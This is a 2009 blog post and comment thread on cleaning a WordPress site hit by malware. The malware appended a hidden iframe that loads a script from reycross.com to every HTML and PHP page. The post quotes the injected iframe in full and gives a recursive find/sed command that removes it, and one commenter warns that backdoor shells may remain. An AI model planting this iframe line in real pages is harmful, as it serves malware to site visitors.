Loading ...It seems that a new WordPress malware hijack is making the rounds and we got hit. Google just issued me a “this site contains malware” warning for my sites, after some quick investigation it looks like the hijack has attached a malicious <iframe> block to the end of every HTML and PHP page in the site, so now I need to clean it out.
Luckily this is just like last time, and was easy to get rid of. I hope this tip helps someone else out as well.
This time, the iframe snippet that was getting added was:
<iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Luckily, I had my old script laying around that systematically searches through all my files and removed the offending piece of crap from the files, you can use this script command as well to do the same:
find . -name '*.*' -exec sed -i 's/<iframe src="http:\/\/reycross.com\/laso\/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;
Hope this helps anybody else getting sacked by this attack. I think it has to do with a theme vulnerability 
Loading ...
September 21st, 2009 at 10:22 am
Thanks for the script. I got infected with the same thing.
Where do I fire of the script at in the shell? can I just do it in the root of my website, or do I need to go into each folder?
The line I’m trying to remove is:
My script looks like this:
find . -name ‘*.*’ -exec sed -i ’s///g’ {} \;
How do I know it successfully cleaned any files?
It appears that the index.php file is infected everywhere, so I manually changed those. I’m afraid that I could possibly still have infected files.
Thanks for your help.
Lance
September 22nd, 2009 at 10:59 am
Lance,
The bug is insidious, it likes to infect every PHP and HTML file it can find.
You want to run this from the root dir of your website, it will crawl *every* file, and every time it finds the offending iframe entry it will remove it (effectively doing a find-replace with “”)
You can see if it’s gone by being sure you dump any cache you have of the site, like WP Super Cache (just hit “Delete cache button”) and then view the website and click around the admin UI and some of the other main public pages and View Source on the page and search for “reycross.com” to make sure it’s gone.
September 24th, 2009 at 12:00 pm
Thanks for the post Riyad.
I successfully removed it with your script.
Greatly appreciated!
October 2nd, 2009 at 11:17 am
Hi please some help here, I have the same rey cross problem, but I dont know what to do with your code :
find . -name ‘*.*’ -exec sed -i ’s///g’ {} \;
I need help in how to use the code.
Best Regards
Edgard
October 2nd, 2009 at 11:52 am
I’ve been hit twice now, Wordpress needs to get their ass in gear before I drop their software.
October 2nd, 2009 at 12:20 pm
Hi Cold,
Do you know how to get rid of it?
Do you know how to use the command or how to activate it?
Regards
Edgar
October 4th, 2009 at 2:09 am
I have this same problem. I am a web site designer/coder… But I don’t have Wordpress. Does anyone know how they actually got onto my webserver (shared hosting on 1and1) and executed this to add the iframe to all my files.. it is worrying from a security perspective and my clients are blaming me
October 5th, 2009 at 7:41 am
Adam,
I *think* it’s related to the theme. I run a handful of sites and all the ones with *this* theme on them got infected, but the other ones that are linked to from this site that had different themes did not get infected.
As for what exactly in the theme caused the issue, I’m afraid I don’t know.
October 5th, 2009 at 7:49 am
Edgar,
You run that command from the command line on your Unix-based system from the root directory of where your site lives. For example /var/www/html
October 14th, 2009 at 11:05 am
i am trying to follow the instructions but i have no idea how to run a script (or get to a command prompt). should i use my ftp site?
October 15th, 2009 at 7:46 am
dana,
You’ll want to use SSH (Putty for Windows works great) to login to the Unix/Linux box that hosts your site, then go to the root directory of your website, usually something like /var/www/html directory, and then run this script — it will go through all files, finding and matching the exact reycross line and removing it. (technically it’s doing a find-replace of the reycross iframe with an empty string)
October 15th, 2009 at 8:01 am
OK… this is the issue. You have been hacked. This is nothing to do with Wordpress or any other particular application. Your server has been compromised. Probably via a SQL attach which has given the user access to your FTP details. Have a look on Google/YouTube to see how easy it is to do. If it wasn’t via SQL attack, then you may have had your FTP info compromised by a bug in early versions of Adobe products. Or, your FTP details have been hacked because they were just too easy to guess.
Answer is this: Download your entire website off your web server. Do a fresh install of WordPress and then mySQL your data back into the site. BUT only run the data you need… nothing else. no config… nothing.
Do not just do the search and replace. The point is that, if someone has had access to your server, which they have, they will have left a backdoor file on there to gain access again – probably a c99.php – which allows them to basically run your server any time they wish. Obviously, they wont have called it c99.php but something less obvious that looks like it should be there. Clean the WHOLE site off and start again!
Change your FTP passowords immediately. Change your WordPress admin passwords… Make sure they are different or you can be SQL attacked. And make sure they are something long with numbers and letters all jumbled up.
And you should be OK
adam clark
http://www.activehq.co.uk